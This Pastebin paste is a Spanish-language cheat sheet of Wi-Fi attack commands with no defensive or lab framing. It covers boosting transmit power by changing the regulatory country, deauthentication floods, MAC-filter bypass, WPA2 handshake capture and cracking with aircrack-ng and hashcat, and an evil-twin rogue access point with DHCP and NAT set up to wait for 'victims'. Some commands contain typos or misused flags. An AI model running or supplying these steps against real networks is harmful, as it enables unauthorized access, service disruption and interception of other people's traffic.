Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- 1. TX Power (en dBm)
- - Configurar CC (Country Code)
- - Configurar el nivel de potencia
- ifconfig wlan0
- iw reg set CL
- iwconfig
- iwconfig wlan0 txpower 27
- iwconfig
- iwconfig wlan0 up
- 2. Descubrir SSID ocultos:
- a) Iniciar monitoreo:
- #airmong-ng start wlan0
- b) Descubrir los AP
- #airodump-ng wlan0mon
- #airodump-ng -c CANAL -bssid MAC_DEL_AP wlan0mon
- Esperar que se asocien los clientes o lanzar un ataque de-auth:
- #aireplay-ng -0 2 -a MAC_DEL_AP(BSSID) wlan0mon
- 3. Bypass filtro MAC:
- a) Iniciar monitoreo:
- airmong-ng start wlan0
- b) Descubrir los AP
- airodump-ng wlan0mon
- c) Usar la MAC del usuario:
- (asociarse con un AP:
- iwconfig wlan0 essid NOMBRE-DE-LA-RED channel 1
- iwconfig
- macchanger -m xx:xx:xx:xx:xx:xx wlan0 (si está en modo monitor: airmon-ng stop wlan0
- 4. Romper claves WPA2
- airmon-ng
- airodump-ng
- aireplay-ng
- aircrack
- a) Airodump y guardar la captura de datos
- airodump-ng -w /root/clavewifi -c 1 --bssid xx:xx:xx:xx:xx:xx (mac del AP) wlan0mon
- b) Enviar un ataque Deauth
- aireplay-ng -0 0 -a MAC_DEL_AP(BSSID) wlan0mon
- c) aircrack /root/clavewifi.cap -w /usr/lib/wordlist/passwords.lst
- PS: Se puede usar hashcat en vez de Aircrack
- 5. AP Falso
- airmon-ng
- airbase-ng
- isc-dhcp-server
- nat (iptables) y la tarjeta eth0 conectada a internet
- a) Instalar un servidor DHCP:
- apt-get install isc-dhcp-server -y
- mv /etc/dhcp/dhcpd.conf /etc/dhcp/dhcpd.conf.backup
- vim /etc/dhcp/dhcpd.conf
- ----------------------
- default-lease-time 600;
- subnet 192.168.2.0 netmask 255.255.255.0 {
- option subnet-mask 255.255.255.0;
- option routers 192.168.2.1;
- option domain-name-servers 8.8.8.8;
- range 192.168.2.51 192.168.2.100;
- }
- -----------------------
- b) poner la tarjeta en modo monitor (detenerla antes)
- airmon-ng start wlan0
- c) iniciar un AP falso:
- airbase-ng --essid "INTERNET_GRATIS" -c 6 wlan0mon
- d) Configurar la interfaz at0 (AP falso) y agregar una ruta local a la red
- ifconfig at0 up
- ifconfig at0 192.168.2.1/24
- route add -net 192.168.2.0 netmask 255.255.255.0 gw 192.168.2.1
- e) Iniciar el servidor DHCP falso
- touch /var/lib/dhcp/dhcpd.leases
- dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcp-server/dhcpd.pid at0
- f) "NATEAR" el tráfico (asumiendo que la interfaz eth0 está conectada)
- iptables --flush
- iptables --table nat --flush
- iptables --delete-chain
- iptables --table nat --delete-chain
- iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
- iptables --append FORWARD --in-interface at0 -j ACCEPT
- echo 1 > /proc/sys/net/ipv4/ip_forward
- g) Esperar que las víctimas se conecten
- 6) Ataques de AP Falso dirigido
- a) Revisar cuales son los SSID preferidos del cliente usando airodump-ng
- b) Levantar un AP falso con el SSID de ese cliente
- Convertir captura de hashes .CAP en CAPHEX para crackear con HASHCAT en MacOSX en vez de AIRCRACK:
- 1) Descargar hashcat-utils
- 2) Compilar el binario "cap2hccapx" (cd src/;gcc cap2hccapx.c -o cap2hccapx.bin)
- 3) Convertir el .cap de Airodump a hccapx:
- cd src/
- chmod +x cap2hccapx.bin
- ./cap2hccapx.bin archivo.cap archivo.hcx
- 4) Crackear con hashcat. 2500 es WPA
- hashcat -m 2500 -w wordlist/rockyou.txt archivo.hcx
Add Comment
Please, Sign In to add comment